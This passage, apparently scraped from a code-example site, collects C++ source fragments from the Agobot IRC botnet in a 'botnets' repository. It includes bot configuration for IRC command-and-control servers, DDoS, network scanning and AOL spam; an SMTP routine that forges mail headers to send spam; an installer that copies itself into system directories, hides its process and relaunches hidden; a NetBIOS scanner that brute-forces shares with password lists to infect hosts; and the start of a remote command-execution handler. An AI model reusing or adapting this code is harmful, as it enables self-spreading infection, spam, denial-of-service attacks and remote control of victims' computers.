	if((nRange.iNetMask%8)!=0)
	{	delete [] szTemp; return false; }

	// Success
	delete [] szTemp; return true; }
示例#23
0
void CBot::Config()
{	init_random(); int iCryptKey=10; CString sTemp; sTemp.Format("%d", brandom(500, 22226));

	g_cMainCtrl.m_cCVar.RegisterCvar(&bot_compnick,"bot_compnick","false","CompName Generated Nick",false,false,0);	
	
	// The root server, this will be the most often used one
	g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServerRoot.si_chanpass,	"si_server_root.chanpass", \
		"",								"Server Info - Channel Password",	false, false, 0 );
	g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServerRoot.si_mainchan,	"si_server_root.mainchan", \
		"#channel",						"Server Info - Main Channel",		false, false, 0 );
	g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServerRoot.si_nickprefix,	"si_server_root.nickprefix", \
		"Ago-",							"Server Info - Nickname prefix",	false, false, 0 );
	g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServerRoot.si_port,		"si_server_root.port", \
		"6667",							"Server Info - Server Port",		false, false, 0 );
	g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServerRoot.si_server,		"si_server_root.server", \
		"irc.somewhere.org",			"Server Info - Server Address",		false, false, 0 );
	g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServerRoot.si_servpass,	"si_server_root.servpass", \
		"",								"Server Info - Server Password",	false, false, 0 );
	g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServerRoot.si_usessl,		"si_server_root.use_ssl", \
		"false",						"Server Info - Use SSL ?",			false, false, 0 );
	g_cMainCtrl.m_cIRC.m_vServers.push_back(&m_isServerRoot);

	// Backup server 0
	g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServer0.si_chanpass,		"si_server_0.chanpass", \
		"",								"Server Info - Channel Password",	false, false, 0 );
	g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServer0.si_mainchan,		"si_server_0.mainchan", \
		"#channel",						"Server Info - Main Channel",		false, false, 0 );
	g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServer0.si_nickprefix,	"si_server_0.nickprefix", \
		"Ago-",							"Server Info - Nickname prefix",	false, false, 0 );
	g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServer0.si_port,			"si_server_0.port", \
		"6667",							"Server Info - Server Port",		false, false, 0 );
	g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServer0.si_server,		"si_server_0.server", \
		"irc2.somewhere.org",			"Server Info - Server Address",		false, false, 0 );
	g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServer0.si_servpass,		"si_server_0.servpass", \
		"",								"Server Info - Server Password",	false, false, 0 );
	g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServer0.si_usessl,		"si_server_0.use_ssl", \
		"false",						"Server Info - Use SSL ?",			false, false, 0 );
	g_cMainCtrl.m_cIRC.m_vServers.push_back(&m_isServer0);

	g_cMainCtrl.m_cCVar.RegisterCvar(&si_chanpass,		"si_chanpass",		"",							"Server Info - Channel Password",					false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&si_mainchan,		"si_mainchan",		"",							"Server Info - Main Channel",						false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&si_nickprefix,	"si_nickprefix",	"",							"Server Info - Nickname prefix",					false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&si_port,			"si_port",			"",							"Server Info - Server Port",						false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&si_server,		"si_server",		"",							"Server Info - Server Address",						false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&si_servpass,		"si_servpass",		"",							"Server Info - Server Password",					false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&si_usessl,		"si_usessl",		"",							"Server Info - Use SSL ?",							false,	false,	0			);

	g_cMainCtrl.m_cCVar.RegisterCvar(&si_nick,			"si_nick",			"",							"Server Info - Nickname",							false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&bot_version,		"bot_version",		VERSION_AGOBOT,				"Bot - Version",									false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&bot_filename,		"bot_filename",		"filename.exe",				"Bot - Runtime Filename",							false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&bot_id,			"bot_id",			"a3-100",					"Bot - Current ID",									false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&bot_prefix,		"bot_prefix",		".",						"Bot - Command Prefix",								false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&bot_ftrans_port,	"bot_ftrans_port",	sTemp.CStr(),				"Bot - File Transfer Port",							false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&bot_timeout,		"bot_timeout",		"720000",					"Bot - Timeout for receiving in miliseconds",		false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&bot_seclogin,		"bot_seclogin",		"false",					"Bot - Enable login only by channel messages",		false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&bot_compnick,		"bot_compnick",		"false",					"Bot - Use the computer name as a nickname",		false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&as_valname,		"as_valname",		"Configuration Loader",		"Autostart - Value Name",							false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&as_enabled,		"as_enabled",		"true",						"Autostart - Enabled",								false,	false,	0			);

	g_cMainCtrl.m_cCVar.RegisterCvar(&scan_maxthreads,	"scan_maxthreads",	"100",						"Scanner - Maximum Number of threads",				false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&scan_auto,		"scan_auto",		"true",						"Scanner - Autoscan local network",					false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&scan_auto,		"scan_auto_nb",		"true",						"Scanner - Autoscan LAN for NetBIOS",				false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&ddos_maxthreads,	"ddos_maxthreads",	"100",						"DDOS - Maximum Number of threads",					false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&redir_maxthreads,	"redir_maxthreads",	"100",						"Redirect - Maximum Number of threads",				false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&identd_enabled,	"identd_enabled",	"false",					"IdentD - Enable the server",						false,	false,	0			);

	g_cMainCtrl.m_cCVar.RegisterCvar(&spam_aol_channel,	"spam_aol_channel",	"#aolspam",					"AOL Spam - Channel name",							false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&spam_aol_enabled,	"spam_aol_enabled",	"true",					"AOL Spam - Channel name",								false,	false,	0			);

	g_cMainCtrl.m_cCVar.SetCVar(&g_cMainCtrl.m_cBot.si_chanpass, g_cMainCtrl.m_cIRC.m_vServers.at(0)->si_chanpass.sValue.CStr());
	g_cMainCtrl.m_cCVar.SetCVar(&g_cMainCtrl.m_cBot.si_mainchan, g_cMainCtrl.m_cIRC.m_vServers.at(0)->si_mainchan.sValue.CStr());
	g_cMainCtrl.m_cCVar.SetCVar(&g_cMainCtrl.m_cBot.si_nickprefix, g_cMainCtrl.m_cIRC.m_vServers.at(0)->si_nickprefix.sValue.CStr());
	g_cMainCtrl.m_cCVar.SetCVar(&g_cMainCtrl.m_cBot.si_port, g_cMainCtrl.m_cIRC.m_vServers.at(0)->si_port.sValue.CStr());
	g_cMainCtrl.m_cCVar.SetCVar(&g_cMainCtrl.m_cBot.si_server, g_cMainCtrl.m_cIRC.m_vServers.at(0)->si_server.sValue.CStr());
	g_cMainCtrl.m_cCVar.SetCVar(&g_cMainCtrl.m_cBot.si_servpass, g_cMainCtrl.m_cIRC.m_vServers.at(0)->si_servpass.sValue.CStr());
	g_cMainCtrl.m_cCVar.SetCVar(&g_cMainCtrl.m_cBot.si_usessl, g_cMainCtrl.m_cIRC.m_vServers.at(0)->si_usessl.sValue.CStr());

	// Use MD5 Passwords, for security reasons
	g_cMainCtrl.m_cMac.AddUser("User",			"MYMD5HASHWILLBEBIGBADANDLONGHEHE",	"Netmask.Net",	""	);	// "password"
}
示例#24
0
文件: smtp.cpp 项目: hazcod/botnets
bool CSMTP_Connection::Mail(CString sMailFrom, CString sMailFromFull, 
							CString sRcptTo, CString sSubject, CString sData) {
	CString sReqBuf, sRecvBuf, sHost, sSrcID, sMTA, sOS;

	init_random();

	m_iMTAType=brandom(MTA_TYPE_UNKNOWN, MTA_TYPE_QMAIL);

	switch(brandom(1,5)) {
	case 1:
		sOS.Assign("Debian"); break;
	case 2:
		sOS.Assign("RedHat"); break;
	case 3:
		sOS.Assign("SuSE"); break;
	case 4:
		sOS.Assign("Slackware"); break;
	case 5:
		sOS.Assign("FreeBSD"); break;
	default:
		sOS.Assign("Unknown"); break; }

	switch(m_iMTAType) {
	case MTA_TYPE_UNKNOWN:
		{	CString sVersionHigh, sVersionLow, sNumber;
			sVersionHigh.Assign(brandom(3, 4)); sVersionLow.Assign(brandom(1, 40));

			sMTA.Format("SMTP %s.%s (%s)",
				sVersionHigh.CStr(), sVersionLow.CStr(), sOS.CStr()); }
		break;
	case MTA_TYPE_EXIM:
		{	CString sVersionHigh, sVersionLow, sNumber;
			sVersionHigh.Assign(brandom(3, 4)); sVersionLow.Assign(brandom(1, 40)); sNumber.Assign(brandom(1, 5));

			sMTA.Format("Exim %s.%s #%s (%s)",
				sVersionHigh.CStr(), sVersionLow.CStr(), sNumber.CStr(), sOS.CStr()); }
		break;
	case MTA_TYPE_SENDMAIL:
		{	CString sVersionHigh, sVersionLow, sVersionLow2;
			sVersionHigh.Assign(brandom(1, 12)); sVersionLow.Assign(brandom(1, 10));
			sVersionLow2.Assign(brandom(1, 10));

			sMTA.Format("8.%s.%s/8.%s.%s",
				sVersionHigh.CStr(), sVersionLow.CStr(), sVersionHigh.CStr(), sVersionLow2.CStr()); }
		break;
	case MTA_TYPE_QMAIL:
		{	CString sPid; sPid.Assign(brandom(1, 65000));
			CString sInvokedBy; int iInvokedBy=brandom(1,3);
			if(iInvokedBy==1) {
				sInvokedBy.Assign("alias");
			} else if(iInvokedBy==2) {
				sInvokedBy.Assign("network");
			} else if(iInvokedBy==3) {
				sInvokedBy.Assign("uid 0");
			}

			sMTA.Format("qmail %s invoked by %s",
				sPid.CStr(), sInvokedBy.CStr()); }
		break;
	case MTA_TYPE_GAIA:
		break;
	case MTA_TYPE_MSSMTPSVC:
		break;
	case MTA_TYPE_MSEXCHANGE:
		break;
	case MTA_TYPE_HOTMAILWM:
		break;
	case MTA_TYPE_WEBMAIL:
		break;
	case MTA_TYPE_POSTFIX:
		break;
	case MTA_TYPE_SMTPD:
		break;
	case MTA_TYPE_LIST_AMIRC:
		break;
	default:
#ifdef DBGCONSOLE
			g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
				"Invalid MTA type selected!\n", this);
#endif // DBGCONSOLE
			Disconnect(); return false;
		break; }

	// Generate an ID
	CString sID=GenerateID(); sSrcID.Assign(sID);

	// Get local hostname
	sHost.Assign(g_pMainCtrl->m_cIRC.m_sLocalHost.CStr());

	// Send MAIL FROM command
	sReqBuf.Format("MAIL FROM:<%s>\r\n", sMailFrom.CStr());
	m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength());

	// Receive reply
	m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192);
	if(sRecvBuf.Mid(0, 3).Compare("250")) {
		// MAIL FROM failed
#ifdef DBGCONSOLE
		g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
			"Server rejected MAIL FROM \"%s\" (\"%s\")!\n", this,
			sMailFrom.CStr(), sRecvBuf.Token(0, "\r").CStr());
#endif // DBGCONSOLE
		Disconnect(); return false;
	}

	// Send RCPT TO command
	sReqBuf.Format("RCPT TO:<%s>\r\n", sRcptTo.CStr());
	m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength());

	// Receive reply
	m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192);
	if(sRecvBuf.Mid(0, 3).Compare("250")) {
		// RCPT TO failed
#ifdef DBGCONSOLE
		g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
			"Server rejected RCTP TO \"%s\" (\"%s\")!\n", this,
			sRcptTo.CStr(), sRecvBuf.Token(0, "\r").CStr());
#endif // DBGCONSOLE
		Disconnect(); return false;
	}

	// Send DATA command
	sReqBuf.Format("DATA\r\n");
	m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength());

	// Receive reply
	m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192);
	if(sRecvBuf.Mid(0, 3).Compare("354")) {
		// DATA failed
#ifdef DBGCONSOLE
		g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
			"Server rejected DATA (\"%s\")!\n", this,
			sRecvBuf.Token(0, "\r").CStr());
#endif // DBGCONSOLE
		Disconnect(); return false;
	}

	// Get local time
	time_t tGlobal=time(NULL); char szTimeBuf[4096];
	strftime(szTimeBuf, sizeof(szTimeBuf), "%a, %d %b %Y %H:%M:%S GMT", gmtime(&tGlobal));

	// Clear buffer
	sReqBuf.Assign("");
	switch(m_iMTAType) {
	case MTA_TYPE_UNKNOWN:
			sReqBuf.Append("Received: from "); sReqBuf.Append(sMailFrom.Token(0, "@").CStr()); sReqBuf.Append(" by ");
			sReqBuf.Append(sHost.CStr()); sReqBuf.Append(" with local\r\n");
			if(m_bUseSMTPExt) {
				// id 1AOkjD-0001RE-00
				sReqBuf.Append("\tid "); sReqBuf.Append(sSrcID.Mid(1)); sReqBuf.Append("\r\n");
				// for <*****@*****.**>; Tue, 25 Nov 2003 22:28:12 +0100
				sReqBuf.Append("\tfor <"); sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">; ");
				sReqBuf.Append(szTimeBuf); sReqBuf.Append("\r\n");
				// Message-Id: <*****@*****.**>
				sReqBuf.Append("Message-Id: <"); sReqBuf.Append(sSrcID.CStr()); sReqBuf.Append("@");
				sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">\r\n");
			}
		break;
	case MTA_TYPE_EXIM:
			// Received: from xxxx by xxxxx.xxxxxxx.xxx with local (Exim 3.36 #1 (Debian))
			sReqBuf.Append("Received: from "); sReqBuf.Append(sMailFrom.Token(0, "@").CStr()); sReqBuf.Append(" by ");
			sReqBuf.Append(sHost.CStr()); sReqBuf.Append(" with local ("); sReqBuf.Append(sMTA.CStr()); sReqBuf.Append(")\r\n");
			if(m_bUseSMTPExt) {
				// id 1AOkjD-0001RE-00
				sReqBuf.Append("\tid "); sReqBuf.Append(sSrcID.Mid(1)); sReqBuf.Append("\r\n");
				// for <*****@*****.**>; Tue, 25 Nov 2003 22:28:12 +0100
				sReqBuf.Append("\tfor <"); sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">; ");
				sReqBuf.Append(szTimeBuf); sReqBuf.Append("\r\n");
				// Message-Id: <*****@*****.**>
				sReqBuf.Append("Message-Id: <"); sReqBuf.Append(sSrcID.CStr()); sReqBuf.Append("@");
				sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">\r\n");
			}
		break;
	case MTA_TYPE_SENDMAIL:
			// Received: from xxxx by xxxx.xxxxxxx.xxx (8.12.8p1/8.12.6) with local
			sReqBuf.Append("Received: from "); sReqBuf.Append(sMailFrom.Token(0, "@").CStr()); sReqBuf.Append(" by ");
			sReqBuf.Append(sHost.CStr()); sReqBuf.Append("(8."); sReqBuf.Append(sMTA.CStr()); sReqBuf.Append(") with local\r\n");
			if(m_bUseSMTPExt) {
				// id 1AOkjD-0001RE-00
				sReqBuf.Append("\tid "); sReqBuf.Append(sSrcID.Mid(1)); sReqBuf.Append("\r\n");
				// for <*****@*****.**>; Tue, 25 Nov 2003 22:28:12 +0100
				sReqBuf.Append("\tfor <"); sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">; ");
				sReqBuf.Append(szTimeBuf); sReqBuf.Append("\r\n");
				// Message-Id: <*****@*****.**>
				sReqBuf.Append("Message-Id: <"); sReqBuf.Append(sSrcID.CStr()); sReqBuf.Append("@");
				sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">\r\n");
			}
		break;
	case MTA_TYPE_QMAIL:
			// Received: (qmail 21608 invoked by alias); 17 Jul 2002 14:30:10 -0000
			sReqBuf.Append("Received: ("); sReqBuf.Append(sMTA.CStr()); sReqBuf.Append("); ");
			sReqBuf.Append(szTimeBuf); sReqBuf.Append("\r\n");
		break;
	case MTA_TYPE_GAIA:
		break;
	case MTA_TYPE_MSSMTPSVC:
		break;
	case MTA_TYPE_MSEXCHANGE:
		break;
	case MTA_TYPE_HOTMAILWM:
		break;
	case MTA_TYPE_WEBMAIL:
		break;
	case MTA_TYPE_POSTFIX:
		break;
	case MTA_TYPE_SMTPD:
		break;
	case MTA_TYPE_LIST_AMIRC:
		break;
	}

	// From: xxxx <*****@*****.**>
	sReqBuf.Append("From: "); sReqBuf.Append(sMailFromFull.CStr()); sReqBuf.Append(" <");
	sReqBuf.Append(sMailFrom.CStr()); sReqBuf.Append(">\r\n");
	// To: [email protected]
	sReqBuf.Append("To: "); sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append("\r\n");
	// Subject: bla
	sReqBuf.Append("Subject: "); sReqBuf.Append(sSubject.CStr()); sReqBuf.Append("\r\n");
	// Date: Tue, 25 Nov 2003 22:28:12 +0100
	sReqBuf.Append("Date: "); sReqBuf.Append(szTimeBuf); sReqBuf.Append("\r\n");
	// MIME-Version: 1.0
	sReqBuf.Append("MIME-Version: 1.0\r\n");
//	if(g_cSMTPLogic.spam_htmlemail.bValue) {
		// Content-Type: text/html; charset=us-ascii
		sReqBuf.Append("Content-Type: text/html; charset=us-ascii\r\n");
//	} else {
//		// Content-Type: text/plain; charset=us-ascii
//		sReqBuf.Append("Content-Type: text/plain; charset=us-ascii\r\n");
//	}
	sReqBuf.Append("Content-Type: text/html; charset=us-ascii\r\n");
	// Content-Transfer-Encoding: 7bit
	sReqBuf.Append("Content-Transfer-Encoding: 7bit\r\n");
	// 
	// <data>
	// .
//	if(g_cSMTPLogic.spam_htmlemail.bValue) {
		sReqBuf.Append("\r\n\r\n");
//	} else {
//		sReqBuf.Append("\r\n");
//	}
	sReqBuf.Append("\r\n\r\n");
	sReqBuf.Append(sData.CStr()); sReqBuf.Append("\r\n.\r\n");

	// Send data
	m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength());

	// Receive reply
	if(!m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192)) {
		// Connection reset
#ifdef DBGCONSOLE
		g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
			"Connection reset!\n", this);
#endif // DBGCONSOLE
		Disconnect(); return false;
	}

	// Check if data was accepted
	if(sRecvBuf.Mid(0, 3).Compare("250")) {
		// Data not accepted
#ifdef DBGCONSOLE
		g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
			"Server rejected MAIL FROM \"%s\", RCPT TO \"%s\"!\n", this,
			sMailFrom.CStr(), sRcptTo.CStr());
#endif // DBGCONSOLE
		Disconnect(); return false;
	}

	return true;
}
示例#25
0
文件: smtp.cpp 项目: hazcod/botnets
bool CSMTP_Connection::Hello() {
	CString sReqBuf; CString sRecvBuf; CString sHost;

	// Get local hostname
	sHost.Assign(g_pMainCtrl->m_cIRC.m_sLocalHost.CStr());
	
	// Send EHLO command
	sReqBuf.Format("EHLO %s\r\n", sHost.CStr());
	m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength());

	// Receive reply
	if(!m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192)) {
		// Connection reset
#ifdef DBGCONSOLE
		g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
			"Connection reset!\n", this);
#endif // DBGCONSOLE
		Disconnect(); return false;
	}

	// Check if EHLO was accepted
	if(sRecvBuf.Mid(0, 3).Compare("250")) {
		// EHLO not accepted, try HELO (no ESMTP)
#ifdef DBGCONSOLE
		g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
			"Server rejected EHLO, disabling SMTP extensions!\n", this);
#endif // DBGCONSOLE

		// Send HELO command
		sReqBuf.Format("HELO %s\r\n", sHost.CStr());
		m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength());

		// Receive reply
		if(!m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192)) {
			// Connection reset
#ifdef DBGCONSOLE
			g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
				"Connection reset!\n", this);
#endif // DBGCONSOLE
			Disconnect(); return false;
		}

		// Check if HELO was accepted
		if(sRecvBuf.Mid(0, 3).Compare("250")) {
			// HELO not accepted
#ifdef DBGCONSOLE
			g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
				"Server rejected HELO!\n", this);
#endif // DBGCONSOLE
			Disconnect(); return false;
		}

		// HELO accepted, disable ESMTP and return true
		m_bUseSMTPExt=false; return true;
	}

#ifdef DBGCONSOLE
	g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
		"Enabled SMTP extensions!\n", this);
#endif // DBGCONSOLE

	// EHLO accepted, enable ESMTP and return true
	m_bUseSMTPExt=true; return true;
}
示例#26
0
bool CInstaller::CopyToSysDir(CString &sFilename)
{
	char tstr[MAX_PATH];
#ifdef WIN32
	CString sysdir; GetSystemDirectory(sysdir.GetBuffer(MAX_PATH), MAX_PATH);
	m_sSysDir.Assign(sysdir.CStr());
	CString cfilename; GetModuleFileName(GetModuleHandle(NULL), cfilename.GetBuffer(MAX_PATH), MAX_PATH);

	HINSTANCE kernel32_dll=LoadLibrary("kernel32.dll");
	if(kernel32_dll)
	{	fRegisterServiceProcess=(RSP)GetProcAddress(kernel32_dll, "RegisterServiceProcess");
		fCreateToolhelp32Snapshot=(CT32S)GetProcAddress(kernel32_dll, "CreateToolhelp32Snapshot");
		fProcess32First=(P32F)GetProcAddress(kernel32_dll, "Process32First");
		fProcess32Next=(P32N)GetProcAddress(kernel32_dll, "Process32Next");
		if(fRegisterServiceProcess) fRegisterServiceProcess(0, 1); }
#else
	if(getuid()) {
		// We aren't root, use /tmp
		m_sSysDir.Assign("/tmp");
	} else {
		// We are root, use /usr/sbin
		m_sSysDir.Assign("/usr/sbin"); }
		
	CString sysdir(m_sSysDir);
	CString cfilename(g_pMainCtrl->m_sArgv0);
#endif // WIN32

#ifdef DBGCONSOLE
	g_cConsDbg.Log(5, "Checking for multiple copies...\n");
#endif // DBGCONSOLE
	if(!g_pMainCtrl->m_cCmdLine.m_cConfig.bUpdate && !g_pMainCtrl->m_cCmdLine.m_cConfig.bService)
	{
		unsigned long lStartTime=GetTickCount(); bool bFound=true;
		while((GetTickCount()-lStartTime) < 60000 && bFound)
		{	if(GetCopies(sFilename)<2) bFound=false; Sleep(1000);
		}
		if(bFound) {
#ifdef DBGCONSOLE
			g_cConsDbg.Log(5, "Found 2 copies, exiting...\n");
#endif // DBGCONSOLE
			exit(1); }
	}

#ifdef DBGCONSOLE
	g_cConsDbg.Log(5, "First copy running...\n");
#endif // DBGCONSOLE
	long lTimeoutStart;

	if(!cfilename.Find(sFilename.CStr(), 0))
		if(g_pMainCtrl->m_cCmdLine.m_cConfig.bUpdate)
			KillProcess(sFilename.CStr());

	if(!cfilename.Find(sysdir, 0) || cfilename.Find("winhlpp32.exe", 0))
#ifdef LINUX
	if(!cfilename.Find(sFilename, 0))
#endif // LINUX
	{	sprintf(tstr, "%s%c%s", sysdir.CStr(), DIRCHAR, sFilename.CStr());

		lTimeoutStart=GetTickCount();

#ifdef DBGCONSOLE
		g_cConsDbg.Log(5, "Trying to copy to system directory...\n");
#endif // DBGCONSOLE

		// FIXME::BAD!!!
#ifdef WIN32
		if(g_pMainCtrl->m_pBot->inst_polymorph.bValue) {
			// Polymorph here
			CPolymorph cPoly; if(!cPoly.DoPolymorph(cfilename, tstr))
			{	// Fall back to copying if this didnt work
				while(CopyFile(cfilename, tstr, false)==false &&
					GetTickCount()-lTimeoutStart < 25000) Sleep(2000);
			} else {
				while(CopyFile(cfilename, tstr, false)==false &&
					GetTickCount()-lTimeoutStart < 25000) Sleep(2000);
			}
		} else {
			// Without Polymorph
			while(CopyFile(cfilename, tstr, false)==false &&
				GetTickCount()-lTimeoutStart < 25000) Sleep(2000);
		}
#else
		char szCmdBuf[MAX_PATH]; sprintf(szCmdBuf, "cp %s %s", cfilename.CStr(), tstr);
		system(szCmdBuf);
#endif // WIN32

#ifdef DBGCONSOLE
		g_cConsDbg.Log(5, "Finished copying to system directory...\n");
#endif // DBGCONSOLE

#ifndef _DEBUG

#ifdef DBGCONSOLE
		g_cConsDbg.Log(5, "Starting new process...\n");
#endif // DBGCONSOLE

		if(g_pMainCtrl->m_pBot->bot_meltserver.bValue) {
			strncat(tstr, " -meltserver \"", sizeof(tstr));
			strncat(tstr, cfilename.CStr(), sizeof(tstr));
			strncat(tstr, "\"", sizeof(tstr));
		}

#ifdef WIN32
		PROCESS_INFORMATION pinfo; STARTUPINFO sinfo;
		memset(&sinfo, 0, sizeof(STARTUPINFO));
		sinfo.cb = sizeof(sinfo); sinfo.wShowWindow = SW_HIDE;
		if(CreateProcess(NULL, tstr, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo)) {
			exit(0); }
#else 
		sprintf(szCmdBuf, "%s 2>&1 > /dev/null 2>&1 &", tstr);
		system(szCmdBuf);
		exit(0);
#endif // WIN32

#endif // _DEBUG
	}
	return true;
}
示例#27
0
void CScannerNetBios::StartScan(const CString &sHost)
{	if(ScanPort(sHost.CStr(), 445) || ScanPort(sHost.CStr(), 139))
	{	g_cMainCtrl.m_cIRC.SendFormat(m_bSilent, m_bNotice, m_sReplyTo.Str(), "%s: scanning ip %s.", m_sScannerName.CStr(), sHost.CStr());

		MultiByteToWideChar(CP_ACP, 0, sHost.CStr(), sHost.GetLength()+1, m_wszHost, (int)sizeof(m_wszHost)/(int)sizeof(m_wszHost[0]));
		wcscpy(m_wszServer, L"\\\\"); wcscat(m_wszServer, m_wszHost);
		wcscpy(m_wszResource, m_wszServer); wcscat(m_wszResource, L"\\IPC$");

		int iNameCount=0, iShareCount=0; m_lUsers.clear(); m_lShares.clear();

		CloseSession();
		if(NullSession()) { GetUsers(&m_lUsers); GetShares(&m_lShares); CloseSession(); }

		while(names[iNameCount])
		{	userinfo *pUser=new userinfo;
			pUser->sName.Assign(names[iNameCount]);
			pUser->sServer.Assign(sHost);
			m_lUsers.push_back(pUser);
			iNameCount++; }
		
		while(shares[iShareCount])
		{	shareinfo *pShare=new shareinfo;
			pShare->sName.Assign(shares[iShareCount]);
			pShare->sRemark.Assign("default");
			m_lShares.push_back(pShare);
			iShareCount++; }
		
		bool bExploited=false;
		
		list<shareinfo*>::iterator iShares; iShares=m_lShares.begin();
		list<userinfo*>::iterator iUsers; iUsers=m_lUsers.begin();
		while(iShares!=m_lShares.end() && !bExploited && m_pScanner->m_bScanning)
		{	while(iUsers!=m_lUsers.end() && !bExploited && m_pScanner->m_bScanning)
			{	WCHAR wszShare[MAX_PATH];
				wcscpy(m_wszServer, L"\\\\"); wcscat(m_wszServer, m_wszHost);
				wcscpy(m_wszResource, m_wszServer); wcscat(m_wszResource, L"\\");
				MultiByteToWideChar(CP_ACP, 0, (*iShares)->sName, (*iShares)->sName.GetLength()+1, wszShare, (int)sizeof(wszShare)/(int)sizeof(wszShare[0]));
				wcscat(m_wszResource, wszShare);

				if(AuthSession((*iUsers)->sName.CStr(), "") && !bExploited)
				{	bExploited=Exploit((*iShares)->sName.CStr(), sHost.CStr(), (*iUsers)->sName.CStr(), "");
					CloseSession(); }

				if(AuthSession((*iUsers)->sName.CStr(), (*iUsers)->sName.CStr()) && !bExploited)
				{	bExploited=Exploit((*iShares)->sName.CStr(), sHost.CStr(), (*iUsers)->sName.CStr(), (*iUsers)->sName.CStr());
					CloseSession(); }

				int pwd_count=0; while(pwds[pwd_count] && !bExploited)
				{	if(AuthSession((*iUsers)->sName.CStr(), pwds[pwd_count]) && !bExploited)
					{	bExploited=Exploit((*iShares)->sName.CStr(), sHost.CStr(), (*iUsers)->sName.CStr(), pwds[pwd_count]);
						CloseSession(); }
					pwd_count++; }

				iUsers++; }
			iShares++; iUsers=m_lUsers.begin(); }

		for(iUsers=m_lUsers.begin(); iUsers!=m_lUsers.end(); ++iUsers) delete (*iUsers);
		for(iShares=m_lShares.begin(); iShares!=m_lShares.end(); ++iShares) delete (*iShares);
		m_lUsers.clear(); m_lShares.clear();
	}
}
示例#28
0
bool CBot::HandleCommand(CMessage *pMsg)
{	
	// ID
	if(!pMsg->sCmd.Compare(m_cmdId.sName.CStr())) {
		return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, bot_id.sValue.Str(), pMsg->sReplyTo.Str()); 
	}

	// Execute
	else if(!pMsg->sCmd.Compare(m_cmdExecute.sName.CStr()))
	{
		CString sText(pMsg->sChatString.Token(2, " ", true)); bool bVisible=atoi(pMsg->sChatString.Token(1, " ").CStr())==1;
		#ifdef WIN32
			CString sTextExp; ExpandEnvironmentStrings(sText.CStr(), sTextExp.GetBuffer(8192), 8192); // interpret environment variables
			sText.Assign(sTextExp); 
			PROCESS_INFORMATION pinfo; 
			STARTUPINFO sinfo;
